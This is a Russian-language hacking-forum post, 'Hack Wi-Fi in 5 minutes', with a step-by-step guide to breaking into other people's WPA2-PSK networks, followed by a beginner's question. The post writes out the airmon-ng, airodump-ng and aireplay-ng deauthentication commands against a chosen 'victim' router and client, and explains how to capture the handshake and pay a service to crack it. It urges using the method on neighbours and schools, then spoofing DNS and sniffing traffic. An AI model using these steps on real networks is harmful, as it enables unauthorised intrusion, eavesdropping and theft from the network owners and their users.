Рекламный баннер

Взлом WI-FI за 5 минут! WPA2-PSK

Добрый Вечер

Premium
Premium

Добрый Вечер

Premium
Premium
Сообщения
553
Реакции
984
Баллы
199
Поехали.
1. Скачиваем kali linux - Для просмотра ссылки Войди или Зарегистрируйся
1.1 Устанавливаем кали линукс на флешку или виртуальную машину
1.3 Запускаемся с флешки или виртуальной машины под кали
2. Открываем консоль
2.1 Пишем: iwconfig и проверяем, определяется ли наша сетевая карта! Если у вас на этом моменте проблемы(с ноутбуками такого не будет), то вам нужно докупить эту карту. За 300 рублей можно взять юсб карту тплинк с алика и все будет в шоколаде.
2.2 Теперь включаем режим мониторинга: airmon-ng start wlan0(влан0 - это значение из параметров сетевой карты, у вас оно может быть немного иное, например mon0)
2.3 Теперь нужно провести сканирование: airodump-ng wlan0
2.4 Здесь мы увидим список вай фай сетей в радиусе нашего аппарата, зависит от сетевой карты. Здесь нужно выбрать объект атаки, выбираем на свой вкус, я обычно беру того у кого сигнал лучше(Уровень сигнала определяется сокращением pwr)
2.5 Теперь нам нужно нажать ctrl+c и остановить сканирование
2.6 Выбрали жертву и пишем: airodump-ng --bssid (здесь пишем бссайди роутера жертвы, его вы видите выше) --channel(тут пишем канал, он обозначивается как ch, например 1 или 8) -w /tmp/nazvanie (это путь где будет конечный файл и название) wlan0
2.7 В самом низу видим тех, кто подключен к сети, выбираем того у кого в значении Frames большее количество(он более активен)
3. Открываем еще одну консоль и пишем: aireplay-ng -0 1(1 - это кол-во пакетов деавторизации, ставьте сразу 50 и ждите) -а (здесь пишем бссайди роутера, его видим в самой верхней строке где его характеристики: уровень сигнала, канал и тд) -с (мак адрес пользователя, которого атакуем, узнать его мак можно под надписью STATION) wlan0
3.1 Ждем пока в первой консоли будет надпись с хендшейком, там еще время будет указано, она будет вверху. Делаем во второй консоли эту команду пока не пройдет хендшейк. Если совсем не проходит, то пишем эту команду заместо той: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 —ignore-negative-one( это для андроид устройств), еще можно деавторизовать сразу всю сеть aireplay-ng --deauth 5 -a (тут прописываешь мак роутера) wlan0
4. Когда получили хендшейк, идем по пути который мы указали и:
4.1 Расшифровываем этот хеш сами, даем людям которые могут это сделать
4.2 Обращаемся к сервису Для просмотра ссылки Войди или Зарегистрируйся(не рекл) и кидаем сюда хеш, он быстро находит(у меня за пару секунд), может быть дольше, но явно быстрее чем на моем ноуте 2009 года :D
После расшифровки вам на почту придет письмо-оповещение, а чтобы получить пароль нужен ключ, 1 стоит 100 рублей, чем больше - тем дешевле. Это единственный минус этого способа, но я предпочитаю его. После покупки ключа он придет на почту, далее вводите его на сайте и готово.
Вот и готово, далее с нашей, теперь нашей! сетью делаем что хотим: подменяем днс, слушаем трафик или просто смотрим фильмы и сидим на нашем любимом форуме :)

Для просмотра ссылки Войди или Зарегистрируйся Сервис для бесплатной расшифровки хешей,

Пару слов о безопасности в работе:
Если использовать данный метод на соседях, в школе, вузе, и прочих простых местах - не беда. Если же вы пойдете на офис, компанию, либо какое-либо место, имеющее важные данные - будьте готовы. Изучите базовые понятия безопасности в kali linux. Хотя врятли в +- серьёзной компании стоит самая простая защита, которую можно вскрыть таким способом. Обычно. У них данные идут через свой сервер, который нужно ломать, чтобы получить пароль.
О безопасности, когда вы сидите в взломанной/бесплатной точке wifi скажу пару правил:
Используйте VPN
Старайтесь не авторизовываться на важных сервисах
Либо пользуйтесь связкой VPN+TOP
Либо вместо впн можно юзать ssh туннель
 

qwerty

Наблюдатель
Новичок

qwerty

Наблюдатель
Новичок
Сообщения
1
Реакции
0
Баллы
1
Добрый вечер, я новичок и я уже долго вожусь с проблемой. У меня не указывает сетевую карту, но работаю я на ноутбуке, Если возможно что-то сделать подскажите пожалуйста что.
 
Сверху